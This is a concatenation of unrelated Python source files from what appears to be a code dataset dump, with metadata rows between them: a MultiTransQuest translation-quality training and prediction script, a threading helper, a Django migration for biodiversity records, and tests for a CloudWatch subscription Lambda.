df_train_bad = df_train_bad.rename(columns={"shuffled_text_a": "text_a"})
df_train_bad = df_train_bad[3500:]
train = pd.concat((df_train_good, df_train_bad), ignore_index=True)
train = train.sample(frac=1, random_state=1)
dev["shuffled_text_a"] = dev["text_a"].sample(frac=1, random_state=1).values
df_dev_good = dev[['text_a', 'text_b']].copy()
df_dev_good['labels'] = np.ones(len(dev)).astype(int)
df_dev_good = df_dev_good[:500]
df_dev_bad = dev[['shuffled_text_a', 'text_b']].copy()
df_dev_bad = df_dev_bad.rename(columns={"shuffled_text_a": "text_a"})
df_dev_bad['labels'] = np.zeros(len(dev)).astype(int)
df_dev_bad = df_dev_bad[500:]
dev = pd.concat((df_dev_good, df_dev_bad), ignore_index=True)
dev = dev.sample(frac=1, random_state=1)
test["shuffled_text_a"] = test["text_a"].sample(frac=1, random_state=1).values
df_test_good = test[['text_a', 'text_b']].copy()
df_test_good['labels'] = np.ones(len(test)).astype(int)
df_test_good = df_test_good[:500]
df_test_bad = test[['shuffled_text_a', 'text_b']].copy()
df_test_bad = df_test_bad.rename(columns={"shuffled_text_a": "text_a"})
df_test_bad['labels'] = np.zeros(len(test)).astype(int)
df_test_bad = df_test_bad[500:]
test = pd.concat((df_test_good, df_test_bad), ignore_index=True)
test = test.sample(frac=1, random_state=1)
test['index'] = np.arange(0, len(test))
# Create test sentence pairs in the expected format
test_sentence_pairs = list(map(list, zip(test['text_a'].to_list(), test['text_b'].to_list())))
# Store dataframes and test sentence pairs
train_dataframes.append(train)
dev_dataframes.append(dev)
test_dataframes.append(test)
list_test_sentence_pairs.append(test_sentence_pairs)
data = [train_dataframes, dev_dataframes, test_dataframes, list_test_sentence_pairs]
test_preds_per_task, dev_preds_per_task = train_MultiTransQuest(data, language, wandb_group,
n_heads=len(train_dataframes), **kwargs)
return test_preds_per_task, dev_preds_per_task
def multitask_partial_input(language="EN-DE", label="DA", wandb_group="adv_partial_input", is_sweeping=False, **kwargs):
if is_sweeping:
with wandb.init(group=wandb_group) as run:
sweep_config = wandb.config
print('CONFIG', wandb.config)
train_dataframes = []
dev_dataframes = []
test_dataframes = []
list_test_sentence_pairs = []
language = sweep_config['language']
label = sweep_config['label']
assert label in ['DA', 'HTER']
partial_inputs = ['both', 'target']
for partial_input in partial_inputs:
# Load train, dev and test data with the corresponding label
train, dev, test = load_MLQE_data(language=language, label=label, prep_for_training=True)
if partial_input == 'source':
train = train.drop('text_b', axis=1)
train = train.rename(columns={"text_a": "text"})
dev = dev.drop('text_b', axis=1)
dev = dev.rename(columns={"text_a": "text"})
test = test.drop('text_b', axis=1)
test = test.rename(columns={"text_a": "text"})
test_sentence_pairs = test['text'].to_list()
elif partial_input == 'target':
train = train.drop('text_a', axis=1)
train = train.rename(columns={"text_b": "text"})
dev = dev.drop('text_b', axis=1)
dev = dev.rename(columns={"text_a": "text"})
test = test.drop('text_b', axis=1)
test = test.rename(columns={"text_a": "text"})
test_sentence_pairs = test['text'].to_list()
else:
test_sentence_pairs = list(map(list, zip(test['text_a'].to_list(), test['text_b'].to_list())))
# Store dataframes and test sentence pairs
train_dataframes.append(train)
dev_dataframes.append(dev)
test_dataframes.append(test)
list_test_sentence_pairs.append(test_sentence_pairs)
data = [train_dataframes, dev_dataframes, test_dataframes, list_test_sentence_pairs]
test_preds_per_task, dev_preds_per_task = train_MultiTransQuest(data, language, wandb_group,
n_heads=len(train_dataframes),
sweep_config=sweep_config)
else:
train_dataframes = []
dev_dataframes = []
test_dataframes = []
list_test_sentence_pairs = []
assert label in ['DA', 'HTER']
partial_inputs = ['both', 'target']
for partial_input in partial_inputs:
# Load train, dev and test data with the corresponding label
train, dev, test = load_MLQE_data(language=language, label=label, prep_for_training=True)
if partial_input == 'source':
train = train.drop('text_b', axis=1)
train = train.rename(columns={"text_a": "text"})
dev = dev.drop('text_b', axis=1)
dev = dev.rename(columns={"text_a": "text"})
test = test.drop('text_b', axis=1)
test = test.rename(columns={"text_a": "text"})
test_sentence_pairs = test['text'].to_list()
elif partial_input == 'target':
train = train.drop('text_a', axis=1)
train = train.rename(columns={"text_b": "text"})
dev = dev.drop('text_b', axis=1)
dev = dev.rename(columns={"text_a": "text"})
test = test.drop('text_b', axis=1)
test = test.rename(columns={"text_a": "text"})
test_sentence_pairs = test['text'].to_list()
else:
test_sentence_pairs = list(map(list, zip(test['text_a'].to_list(), test['text_b'].to_list())))
# Store dataframes and test sentence pairs
train_dataframes.append(train)
dev_dataframes.append(dev)
test_dataframes.append(test)
list_test_sentence_pairs.append(test_sentence_pairs)
data = [train_dataframes, dev_dataframes, test_dataframes, list_test_sentence_pairs]
test_preds_per_task, dev_preds_per_task = train_MultiTransQuest(data, language,
n_heads=len(train_dataframes), **kwargs)
return test_preds_per_task, dev_preds_per_task
def multitask_sentence_length(language='EN-DE', label="DA", sentence_length_input='text_a', wandb_group="adv-sentence-length",
is_sweeping=False, **kwargs):
if is_sweeping:
with wandb.init(group=wandb_group) as run:
sweep_config = wandb.config
print('CONFIG', wandb.config)
language = sweep_config['language']
label = sweep_config['label']
sentence_length_input = sweep_config['sentence_length_input']
config_defaults = multitransquest_config
run.config.setdefaults(config_defaults)
print(wandb_group)
print('CONFIG', wandb.config)
train_dataframes = []
dev_dataframes = []
test_dataframes = []
list_test_sentence_pairs = []
assert label in ['DA', 'HTER']
assert sentence_length_input in ['text_a', 'text_b']
for use_sentence_length in [False, True]:
# Load train, dev and test data with the corresponding label
train, dev, test = load_MLQE_data(language=language, label=label, prep_for_training=True)
if use_sentence_length:
train['labels'] = train[sentence_length_input].str.split().str.len()
dev['labels'] = dev[sentence_length_input].str.split().str.len()
test['labels'] = test[sentence_length_input].str.split().str.len()
test_sentence_pairs = list(map(list, zip(test['text_a'].to_list(), test['text_b'].to_list())))
# Store dataframes and test sentence pairs
train_dataframes.append(train)
dev_dataframes.append(dev)
test_dataframes.append(test)
list_test_sentence_pairs.append(test_sentence_pairs)
data = [train_dataframes, dev_dataframes, test_dataframes, list_test_sentence_pairs]
test_preds_per_task, dev_preds_per_task = train_MultiTransQuest(data, language, wandb_group,
n_heads=len(train_dataframes),
sweep_config=sweep_config)
else:
train_dataframes = []
dev_dataframes = []
test_dataframes = []
list_test_sentence_pairs = []
assert label in ['DA', 'HTER']
assert sentence_length_input in ['text_a', 'text_b']
for use_sentence_length in [False, True]:
# Load train, dev and test data with the corresponding label
train, dev, test = load_MLQE_data(language=language, label=label, prep_for_training=True)
if use_sentence_length:
train['labels'] = train[sentence_length_input].str.split().str.len()
dev['labels'] = dev[sentence_length_input].str.split().str.len()
test['labels'] = test[sentence_length_input].str.split().str.len()
test_sentence_pairs = list(map(list, zip(test['text_a'].to_list(), test['text_b'].to_list())))
# Store dataframes and test sentence pairs
train_dataframes.append(train)
dev_dataframes.append(dev)
test_dataframes.append(test)
list_test_sentence_pairs.append(test_sentence_pairs)
data = [train_dataframes, dev_dataframes, test_dataframes, list_test_sentence_pairs]
test_preds_per_task, dev_preds_per_task = train_MultiTransQuest(data, language,
n_heads=len(train_dataframes), **kwargs)
return test_preds_per_task, dev_preds_per_task
# Inference: Using the trained model for predictions
def predict_MultiTransQuest(model_language='EN-DE', language="EN-DE", evaluation_type="DA", save_results=True, dataset="test", data='MLQE', task_number=0, task="regression", aux_type="multilanguage", experiment='', partial_input=None, shuffle_column=None, **kwargs):
if "task_config" in kwargs:
task_config = kwargs.get("task_config")
multitransquest_config.update(task_config)
if data == 'wikimatrix':
if model_language == 'EN-DE':
file = "ende_9000_aug_custom_pipeline.tsv"
#elif model_language == 'EN-ZH':
# file = "enzh_9000_aug_custom_pipeline.tsv"
else:
print('Please specify WikiMatrix data file')
train, dev, test = load_WikiMatrix_data(file=file, language=language, prep_for_training=True)
else:
if evaluation_type == 'DA':
train, dev, test = load_MLQE_data(language=language, label='DA', prep_for_training=True)
else:
train, dev, test = load_MLQE_data(language=language, label='HTER', prep_for_training=True)
if dataset == 'test':
reference=test
if partial_input == "target":
test = test.drop('text_a', axis=1)
test = test.rename(columns={"text_b": "text"})
test_sentence_pairs = test['text'].to_list()
elif partial_input == "source":
test = test.drop('text_b', axis=1)
test = test.rename(columns={"text_a": "text"})
test_sentence_pairs = test['text'].to_list()
else:
if shuffle_column is not None:
assert shuffle_column in ['text_a', 'text_b']
test = swap_sentence_pairs(test, shuffle_column=shuffle_column)
test_sentence_pairs = list(map(list, zip(test['text_a'].to_list(), test['text_b'].to_list())))
elif dataset == 'dev':
reference = dev
if partial_input == "target":
dev = dev.drop('text_a', axis=1)
dev = dev.rename(columns={"text_b": "text"})
test_sentence_pairs = dev['text'].to_list()
elif partial_input == "source":
dev = dev.drop('text_b', axis=1)
dev = dev.rename(columns={"text_a": "text"})
test_sentence_pairs = dev['text'].to_list()
else:
if shuffle_column is not None:
assert shuffle_column in ['text_a', 'text_b']
dev = swap_sentence_pairs(dev, shuffle_column=shuffle_column)
test_sentence_pairs = list(map(list, zip(dev['text_a'].to_list(), dev['text_b'].to_list())))
else:
print('Please specify the dataset used for predictions (either dev or test)')
model = MultiTransQuestModel(MODEL_TYPE, multitransquest_config["best_model_dir"],
use_cuda=torch.cuda.is_available(), wandb_group="aug_data_multitask",
args=multitransquest_config, **kwargs)
predictions, raw_outputs = model.predict(test_sentence_pairs, curr_task=task_number)
if data == 'wikimatrix':
df_pred = pd.DataFrame(predictions, columns=['prediction'])
else:
df_pred = pd.DataFrame(predictions, columns=['Predicted_' + evaluation_type])
if save_results:
if experiment == "FINAL":
seed = task_config['manual_seed']
print("Seed:",seed)
if language == model_language:
if partial_input == "source":
df_pred.to_csv(
'DATA/MLQE-PE/' + model_language + '/predictions/multitask/' + aux_type + '/' + experiment + '/' + dataset + '_data/' + str(seed) + '_pred_' + dataset + '_' + evaluation_type + '_multi_partial_source.csv')
elif partial_input == "target":
df_pred.to_csv(
'DATA/MLQE-PE/' + model_language + '/predictions/multitask/' + aux_type + '/' + experiment + '/' + dataset + '_data/' + str(seed) + '_pred_' + dataset + '_' + evaluation_type + '_multi_partial_target.csv')
elif shuffle_column == "text_a":
df_pred.to_csv(
'DATA/MLQE-PE/' + model_language + '/predictions/multitask/' + aux_type + '/' + experiment + '/' + dataset + '_data/' + str(seed) + '_pred_' + dataset + '_' + evaluation_type + '_multi_shuffle_source.csv')
elif shuffle_column == "text_b":
df_pred.to_csv(
'DATA/MLQE-PE/' + model_language + '/predictions/multitask/' + aux_type + '/' + experiment + '/' + dataset + '_data/' + str(seed) + '_pred_' + dataset + '_' + evaluation_type + '_multi_shuffle_target.csv')
else:
df_pred.to_csv(
'DATA/MLQE-PE/' + model_language + '/predictions/multitask/' + aux_type + '/' + experiment + '/' + dataset + '_data/' + str(seed) + '_pred_' + dataset + '_' + evaluation_type + '_multi.csv')
# Out of domain predictions
else:
if partial_input == "source":
df_pred.to_csv(
'DATA/MLQE-PE/' + model_language + '/predictions/multitask/' + aux_type + '/' + experiment + '/' + str(seed) + '_' + dataset + '_data/OOD_' + language + '_pred_' + dataset + '_' + evaluation_type + '_multi_partial_source.csv')
elif partial_input == "target":
df_pred.to_csv(
'DATA/MLQE-PE/' + model_language + '/predictions/multitask/' + aux_type + '/' + experiment + '/' + str(seed) + '_' + dataset + '_data/OOD_' + language + '_pred_' + dataset + '_' + evaluation_type + '_multi_partial_target.csv')
elif shuffle_column == "text_a":
df_pred.to_csv(
'DATA/MLQE-PE/' + model_language + '/predictions/multitask/' + aux_type + '/' + experiment + '/' + str(seed) + '_' + dataset + '_data/OOD_' + language + '_pred_' + dataset + '_' + evaluation_type + '_multi_shuffle_source.csv')
elif shuffle_column == "text_b":
df_pred.to_csv(
'DATA/MLQE-PE/' + model_language + '/predictions/multitask/' + aux_type + '/' + experiment + '/' + str(seed) + '_' + dataset + '_data/OOD_' + language + '_pred_' + dataset + '_' + evaluation_type + '_multi_shuffle_target.csv')
else:
df_pred.to_csv(
'DATA/MLQE-PE/' + model_language + '/predictions/multitask/' + aux_type + '/' + experiment + '/'+ str(seed) + '_' + dataset + '_data/OOD_' + language + '_pred_' + dataset + '_' + evaluation_type + '_multi.csv')
else:
if language == model_language:
if partial_input == "source":
df_pred.to_csv(
'DATA/MLQE-PE/' + model_language + '/predictions/multitask/'+aux_type+'/' +experiment+'/' + dataset + '_data/pred_' + dataset + '_' + evaluation_type + '_multi_partial_source.csv')
elif partial_input == "target":
df_pred.to_csv(
'DATA/MLQE-PE/' + model_language + '/predictions/multitask/'+aux_type+'/' +experiment+'/' + dataset + '_data/pred_' + dataset + '_' + evaluation_type + '_multi_partial_target.csv')
elif shuffle_column == "text_a":
df_pred.to_csv(
'DATA/MLQE-PE/' + model_language + '/predictions/multitask/'+aux_type+'/' +experiment+'/' + dataset + '_data/pred_' + dataset + '_' + evaluation_type + '_multi_shuffle_source.csv')
elif shuffle_column == "text_b":
df_pred.to_csv(
'DATA/MLQE-PE/' + model_language + '/predictions/multitask/'+aux_type+'/' +experiment+'/' + dataset + '_data/pred_' + dataset + '_' + evaluation_type + '_multi_shuffle_target.csv')
else:
df_pred.to_csv(
'DATA/MLQE-PE/' + model_language + '/predictions/multitask/'+aux_type+'/' +experiment+'/' + dataset + '_data/pred_' + dataset + '_' + evaluation_type + '_multi.csv')
# Out of domain predictions
else:
if partial_input == "source":
df_pred.to_csv(
'DATA/MLQE-PE/' + model_language + '/predictions/multitask/'+aux_type+'/' +experiment+'/' + dataset + '_data/OOD_' + language + '_pred_' + dataset + '_' + evaluation_type + '_multi_partial_source.csv')
elif partial_input == "target":
df_pred.to_csv(
'DATA/MLQE-PE/' + model_language + '/predictions/multitask/'+aux_type+'/' +experiment+'/' + dataset + '_data/OOD_' + language + '_pred_' + dataset + '_' + evaluation_type + '_multi_partial_target.csv')
elif shuffle_column == "text_a":
df_pred.to_csv(
'DATA/MLQE-PE/' + model_language + '/predictions/multitask/'+aux_type+'/' +experiment+'/' + dataset + '_data/OOD_' + language + '_pred_' + dataset + '_' + evaluation_type + '_multi_shuffle_source.csv')
elif shuffle_column == "text_b":
df_pred.to_csv(
'DATA/MLQE-PE/' + model_language + '/predictions/multitask/'+aux_type+'/' +experiment+'/' + dataset + '_data/OOD_' + language + '_pred_' + dataset + '_' + evaluation_type + '_multi_shuffle_target.csv')
else:
df_pred.to_csv(
'DATA/MLQE-PE/' + model_language + '/predictions/multitask/'+aux_type+'/' +experiment+'/' + dataset + '_data/OOD_' + language + '_pred_' + dataset + '_' + evaluation_type + '_multi.csv')
return df_pred, reference
def main():
sweep_id = wandb.sweep(sweep=SWEEP_CONFIG, project="multi-transquest")
wandb.agent(sweep_id, function=multitask_augmented_wiki_data, count=20)
model_language = "EN-DE"
label = "DA"
languages = ['EN-DE', 'EN-ZH', 'RO-EN', 'ET-EN', 'SI-EN', 'NE-EN', 'RU-EN']
val_sets = ["test", "dev"]
for val_set in val_sets:
for val_language in languages:
# Out of domain predictions
if model_language != val_language:
predict_MultiTransQuest(language=val_language, model_language=model_language, dataset=val_set, aux_type="aug",
evaluation_type=label, data='MLQE', task='regression', partial_input=False)
if val_language == model_language:
# Predict on both sentences
predict_MultiTransQuest(language=val_language, model_language=model_language, dataset=val_set, aux_type="aug",
evaluation_type=label, data='MLQE', task='regression')
# Predict on partial input and shuffled datasets
predict_MultiTransQuest(language=val_language, model_language=model_language, dataset=val_set, aux_type="aug",
evaluation_type=label, data='MLQE', task='regression', partial_input="source", )
predict_MultiTransQuest(language=val_language, model_language=model_language, dataset=val_set, aux_type="aug",
evaluation_type=label, data='MLQE', task='regression', partial_input="target")
predict_MultiTransQuest(language=val_language, model_language=model_language, dataset=val_set, aux_type="aug",
evaluation_type=label, data='MLQE', task='regression', shuffle_column="text_a")
predict_MultiTransQuest(language=val_language, model_language=model_language, dataset=val_set, aux_type="aug",
evaluation_type=label, data='MLQE', task='regression', shuffle_column="text_b")
if __name__ == "__main__":
main()
| 50.259101
| 266
| 0.587427
| 5,241
| 46,942
| 4.931311
| 0.058004
| 0.049294
| 0.062488
| 0.032501
| 0.847321
| 0.830064
| 0.816019
| 0.79822
| 0.787618
| 0.783285
| 0
| 0.004013
| 0.304653
| 46,942
| 933
| 267
| 50.312969
| 0.787782
| 0.039581
| 0
| 0.763081
| 0
| 0
| 0.102023
| 0.0262
| 0
| 0
| 0
| 0
| 0.013081
| 1
| 0.013081
| false
| 0
| 0.047965
| 0
| 0.072674
| 0.03343
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d1d038b3c27b15a35458be16ee758e0b16121b66
| 118
|
py
|
Python
|
src/opera/threading/utils.py
|
Legion2/xopera-opera
|
808f23cbac326b6d067e6ec531a0109ae02d0f5e
|
[
"Apache-2.0"
] | null | null | null |
src/opera/threading/utils.py
|
Legion2/xopera-opera
|
808f23cbac326b6d067e6ec531a0109ae02d0f5e
|
[
"Apache-2.0"
] | null | null | null |
src/opera/threading/utils.py
|
Legion2/xopera-opera
|
808f23cbac326b6d067e6ec531a0109ae02d0f5e
|
[
"Apache-2.0"
] | null | null | null |
from threading import current_thread
def print_thread(str):
print("[{}] {}".format(current_thread().name, str))
| 19.666667
| 55
| 0.70339
| 15
| 118
| 5.333333
| 0.666667
| 0.325
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.127119
| 118
| 5
| 56
| 23.6
| 0.776699
| 0
| 0
| 0
| 0
| 0
| 0.059322
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0
| 0.666667
| 0.666667
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 1
| 1
|
0
| 7
|
d1dc6c49f1963433fcaef822a68e321440aec237
| 4,459
|
py
|
Python
|
django_app/migrations/0013_auto_20201110_1850.py
|
jorgeassis/darwinCoreGUI
|
3cfd1752acb77fd56ad4511d9e1a83bc86252449
|
[
"CC0-1.0"
] | null | null | null |
django_app/migrations/0013_auto_20201110_1850.py
|
jorgeassis/darwinCoreGUI
|
3cfd1752acb77fd56ad4511d9e1a83bc86252449
|
[
"CC0-1.0"
] | null | null | null |
django_app/migrations/0013_auto_20201110_1850.py
|
jorgeassis/darwinCoreGUI
|
3cfd1752acb77fd56ad4511d9e1a83bc86252449
|
[
"CC0-1.0"
] | null | null | null |
# Generated by Django 3.1.3 on 2020-11-10 18:50
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('django_app', '0012_auto_20201110_1848'),
]
operations = [
migrations.AlterField(
model_name='biodiversityrecords',
name='SampleN',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='biodiversityrecords',
name='bibliographicCitation',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='biodiversityrecords',
name='coordinateUncertaintyInMeters',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='biodiversityrecords',
name='day',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='biodiversityrecords',
name='decimalLatitude',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='biodiversityrecords',
name='decimalLongitude',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='biodiversityrecords',
name='fieldNotes',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='biodiversityrecords',
name='georeferenceRemarks',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='biodiversityrecords',
name='identificationRemarks',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='biodiversityrecords',
name='individualCount',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='biodiversityrecords',
name='license',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='biodiversityrecords',
name='maximumDepthInMeters',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='biodiversityrecords',
name='measurementRemarks',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='biodiversityrecords',
name='measurementValue',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='biodiversityrecords',
name='minimumDepthInMeters',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='biodiversityrecords',
name='month',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='biodiversityrecords',
name='namePublishedInYear',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='biodiversityrecords',
name='organismQuantity',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='biodiversityrecords',
name='recordNumber',
field=models.IntegerField(blank=True, null=True),
),
migrations.AlterField(
model_name='biodiversityrecords',
name='sampleSizeValue',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='biodiversityrecords',
name='taxonRemarks',
field=models.TextField(blank=True, null=True),
),
migrations.AlterField(
model_name='biodiversityrecords',
name='verbatimDepth',
field=models.FloatField(blank=True, null=True),
),
migrations.AlterField(
model_name='biodiversityrecords',
name='year',
field=models.IntegerField(blank=True, null=True),
),
]
| 34.565891
| 61
| 0.579726
| 352
| 4,459
| 7.267045
| 0.167614
| 0.179828
| 0.224785
| 0.260751
| 0.810399
| 0.810399
| 0.79007
| 0.774433
| 0.774433
| 0.774433
| 0
| 0.010094
| 0.311281
| 4,459
| 128
| 62
| 34.835938
| 0.822859
| 0.010092
| 0
| 0.754098
| 1
| 0
| 0.182004
| 0.021306
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.008197
| 0
| 0.032787
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
ae819ed07b666ee5dcbef5bf44de7596ef8cd5b7
| 3,082
|
py
|
Python
|
tests/test_cloudwatch_subscription_lambda.py
|
binxio/blog-cloudwatch-subscription-elasticsearch-lambda
|
f068a45c4d11df120bbe06d39674ec58d5697de8
|
[
"Apache-2.0"
] | 1
|
2021-06-05T16:19:23.000Z
|
2021-06-05T16:19:23.000Z
|
tests/test_cloudwatch_subscription_lambda.py
|
binxio/blog-cloudwatch-subscription-elasticsearch-lambda
|
f068a45c4d11df120bbe06d39674ec58d5697de8
|
[
"Apache-2.0"
] | null | null | null |
tests/test_cloudwatch_subscription_lambda.py
|
binxio/blog-cloudwatch-subscription-elasticsearch-lambda
|
f068a45c4d11df120bbe06d39674ec58d5697de8
|
[
"Apache-2.0"
] | null | null | null |
from lambdas.cloudwatch_subscription_lambda import *
import json
def event() -> dict:
return {
"awslogs": {"data": "H4sIAAAAAAAAAKVSXXPaMBD8Kx5PH1GQZNmS/AbFSchXKZA2kzjTEdZBPGMw9UdIyvDfe8ZJylObTp5s3+7d7Xpv6y6hLM0Cps9rcEN30Jv2flxGk0nvJHI7br5ZQYHlgHGhPM1FICmWs3xxUuT1GpGu2ZTdzCxn1nSTLK/txlTJAynrWZkU6bpK8xWBzJRVmpRgyLRIFwsojutVsofYcHxyxs5u5Oj8dfKkKsAscTSnTHUZ63LWvft00ZtGk+m9J40E61MFcyM8I1QiZAAQJB7XCozEEYerj9OsgqJ0wzv33+IKhODJLNcZkAP25+b1e/N6geIOW9loGHnSOxsMb0+v3fu9+ugRVlWzcOumFk14QlCfak0lo55kzOe+DDwZcBroQHhSUOEprZCklAi40AyxQCk0UqWYTYV63JD5gksptdZS8c5rZjh+G7uPaBDVxG7oxC6N3Q4+Utt+Btr6CnxDmA04SYApMrcyIVxQPTN85gkj2g4LlUkzUuEZtK2T5AFsnYF19pZaVpnXRfJCwOCPYO+2xUyS5HVD3C8+OJgWbty0WJMrYYxwNqV+yIOQs9uWU8DizQnUZIP2CXuF2t1lg97htmIVooKwVRC+scPDzWGBBv5+lgfxttGNsQXVfft6Or4Zj/rReT/GaN/+ULN+u9vFK3fX+VjE+p0RR1cDZww/ayQObehQP0Fv1BKwohEKiui5nhM1t3PLMFRr2MfVafpOdeNo9GU8/W+B1aAuTJMC8o884SzLuOqnWXNufxBGKQJOXF3CMi+enUn6C7DKlXPZx6J5cl6A6xJwMWf7emP+fvcbIoYHFtkEAAA="}}
def log_line() -> str:
return "{\"version\": \"0\", \"id\": \"7fceb3f1-f0f7-3529-09dc-5b10edf9cb2b\", \"detail-type\": \"Scheduled Event\", \"source\": \"aws.events\", \"account\": \"612483924670\", \"time\": \"2018-11-21T05:24:21Z\", \"region\": \"eu-west-1\", \"resources\": [\"arn:aws:events:eu-west-1:612483924670:rule/cloudwatch-subscription-elast-CloudWatchEventsRule-11VQHRXRPBEKB\"], \"detail\": {}}\n"
def test_decode_event():
assert decode_event(event()) == {'messageType': 'DATA_MESSAGE', 'owner': '612483924670', 'logGroup': '/aws/lambda/cloudwatch-subscription-elasticsea-TriggerFunction-1IRGJ1JX7PK70', 'logStream': '2018/11/21/[$LATEST]37a7ed508efa43a48c476ee6c3298ea7', 'subscriptionFilters': ['cloudwatch-subscription-elasticsearch-example-cloudwatch-CloudWatchLogSubscription-1PIE373JDIZHU'], 'logEvents': [{'id': '34405099071037115257637620696437404389840588462491762688', 'timestamp': 1542777999782, 'message': '{"version": "0", "id": "69d58e5a-1d62-ce18-fd7c-2409ba2b34a4", "detail-type": "Scheduled Event", "source": "aws.events", "account": "612483924670", "time": "2018-11-21T05:26:21Z", "region": "eu-west-1", "resources": ["arn:aws:events:eu-west-1:612483924670:rule/cloudwatch-subscription-elast-CloudWatchEventsRule-11VQHRXRPBEKB"], "detail": {}}\n'}, {'id': '34405099071037115257637620696437404389840588462491762689', 'timestamp': 1542777999782, 'message': 'END RequestId: 05c2460d-ed4e-11e8-9f9f-8fdfd1ba2da1\n'}, {'id': '34405099071037115257637620696437404389840588462491762690', 'timestamp': 1542777999782, 'message': 'REPORT RequestId: 05c2460d-ed4e-11e8-9f9f-8fdfd1ba2da1\tDuration: 0.34 ms\tBilled Duration: 100 ms \tMemory Size: 128 MB\tMax Memory Used: 21 MB\t\n'}]}
def test_load_log_line():
assert json.loads(log_line()) == {'version': '0', 'id': '7fceb3f1-f0f7-3529-09dc-5b10edf9cb2b', 'detail-type': 'Scheduled Event', 'source': 'aws.events', 'account': '612483924670', 'time': '2018-11-21T05:24:21Z', 'region': 'eu-west-1', 'resources': ['arn:aws:events:eu-west-1:612483924670:rule/cloudwatch-subscription-elast-CloudWatchEventsRule-11VQHRXRPBEKB'], 'detail': {}}
| 192.625
| 1,271
| 0.791045
| 272
| 3,082
| 8.922794
| 0.492647
| 0.054388
| 0.017305
| 0.029666
| 0.316852
| 0.316852
| 0.283066
| 0.283066
| 0.283066
| 0.283066
| 0
| 0.205742
| 0.050616
| 3,082
| 15
| 1,272
| 205.466667
| 0.623718
| 0
| 0
| 0
| 0
| 0.363636
| 0.728748
| 0.527579
| 0
| 0
| 0
| 0
| 0.181818
| 1
| 0.363636
| true
| 0
| 0.181818
| 0.181818
| 0.727273
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 10
|
88181c9a6fd627934ecb3115109b3ce13ed61353
| 371
|
py
|
Python
|
python/trump.py
|
flaireclair/AIPoker
|
519cff95ee36333f580d273c569c840fb8920ac2
|
[
"MIT"
] | 1
|
2020-02-04T14:22:33.000Z
|
2020-02-04T14:22:33.000Z
|
python/trump.py
|
flaireclair/AIPoker
|
519cff95ee36333f580d273c569c840fb8920ac2
|
[
"MIT"
] | null | null | null |
python/trump.py
|
flaireclair/AIPoker
|
519cff95ee36333f580d273c569c840fb8920ac2
|
[
"MIT"
] | null | null | null |
cards = {'SPADE' : ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13'],
'HEART' : ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13'],
'CLUB' : ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13'],
'DIAMOND' : ['1', '2', '3', '4', '5', '6', '7', '8', '9', '10', '11', '12', '13']
}
| 61.833333
| 90
| 0.253369
| 57
| 371
| 1.649123
| 0.315789
| 0.085106
| 0.12766
| 0.170213
| 0.723404
| 0.723404
| 0.723404
| 0.723404
| 0.723404
| 0.723404
| 0
| 0.25
| 0.266846
| 371
| 5
| 91
| 74.2
| 0.095588
| 0
| 0
| 0
| 0
| 0
| 0.239892
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 10
|
88863a5400b019d5bbed2e5dc5f0efb6df17ae7e
| 17,710
|
py
|
Python
|
atomia_manager/atomia_tests.py
|
stefan-stankovic-atomia/AutomationServerManager
|
